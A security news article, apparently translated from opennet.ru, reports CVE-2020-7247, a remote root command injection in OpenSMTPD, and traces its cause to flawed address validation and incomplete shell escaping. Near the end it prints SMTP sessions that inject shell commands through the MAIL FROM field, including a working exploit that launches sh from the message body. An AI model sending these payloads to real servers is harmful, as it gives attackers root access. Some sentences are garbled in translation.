In the mail server developed by the OpenBSD project identified (CVE-2020-7247) that allows you to remotely execute shell commands on a server with root user rights. The vulnerability was identified during a re-audit conducted by Qualys Security (previous audit of OpenSMTPD in 2015, and the new vulnerability has been present since May 2018). Problem in the release of OpenSMTPD 6.6.2. All users are advised to urgently install the update (for OpenBSD, the patch can be installed via syspatch).
Two types of attack have been proposed. The first option works in the default OpenSMTPD configuration (receiving requests only from localhost) and allows you to exploit the problem locally, when the attacker is able to access the local network interface (loopback) on the server (for example, on hosting systems). The second option appears when OpenSMTPD is configured to accept external network requests (a mail server that accepts third-party mail). Researchers have prepared a prototype exploit that successfully works both with the OpenSMTPD variant from OpenBSD 6.6 and with a portable version for other operating systems (conducted in Debian Testing).
The problem is caused by an error in the smtp_mailaddr() function, which is called to check the correctness of the values in the "MAIL FROM" and "RCPT TO" fields that determine the sender / recipient and are transmitted during the connection to the mail server. The smtp_mailaddr() function is called in smtp_mailaddr() to check for the part of the mail address that comes before the "@" character.
valid_localpart(), which considers "!#$%&'*/?^`{|}~+-=_" characters as allowed (MAILADDR_ALLOWED), as required by RFC 5322.
In this case, the string is directly escaped in the mda_expand_token() function, which replaces only the characters "!#$%&'*?`{|}~" (MAILADDR_ESCAPE). Further, the string prepared in mda_expand_token() is used when calling the delivery agent (MDA) using the command 'execle("/bin/sh", "/bin/sh", "-c", mda_command,…'. mail to mbox via /bin/sh, the line "/usr/libexec/mail.local -f %%{mbox.from} %%{user.username}" is run, where the value "%{mbox.from}" includes escaped data from the "MAIL FROM" parameter.
The essence of the vulnerability is that smtp_mailaddr() has a logical error due to which, if an empty domain is passed to email, the function returns a successful verification code, even if the part of the address before “@” contains invalid characters. Further, when preparing a string with the mda_expand_token() function, not all possible shell special characters are escaped, but only special characters allowed in the mail address. Thus, to run your command, it is enough to use the symbol ";" in the local part of the email. and space, which are not in the MAILADDR_ESCAPE set and are not escaped. For example:
$nc 127.0.0.1 25
HELO professor.falken
MAIL FROM:<;sleep 66;>
RCPT TO:
DATE
.
QUIT
After this session, OpenSMTPD, when delivered to mbox, will run the command via shell
/usr/libexec/mail.local -f ;sleep 66; root
At the same time, the attack possibilities are limited by the fact that the local part of the address cannot exceed 64 characters, and the special characters '$' and '|' are replaced with ":" when escaping. To circumvent this limitation, the fact that the body of the message is transmitted after running /usr/libexec/mail.local through the input stream, i.e. through manipulation with the address, you can only launch the sh command interpreter and use the body of the letter as a set of instructions. Since service SMTP headers are specified at the beginning of the letter, it is suggested to use the read command call in a loop to skip them. The working exploit looks something like this:
$nc 192.168.56.143 25
HELO professor.falken
MAIL FROM:<;for i in 0 1 2 3 4 5 6 7 8 9 abcd;do read r;done;sh;exit 0;>
RCPT TO:[email protected]>
DATE
#0
#1
...
#d
for i in WOPR; do
echo -n "($i) " && id || break
done > /root/x."`id -u`"."$$"
.
QUIT
Source: opennet.ru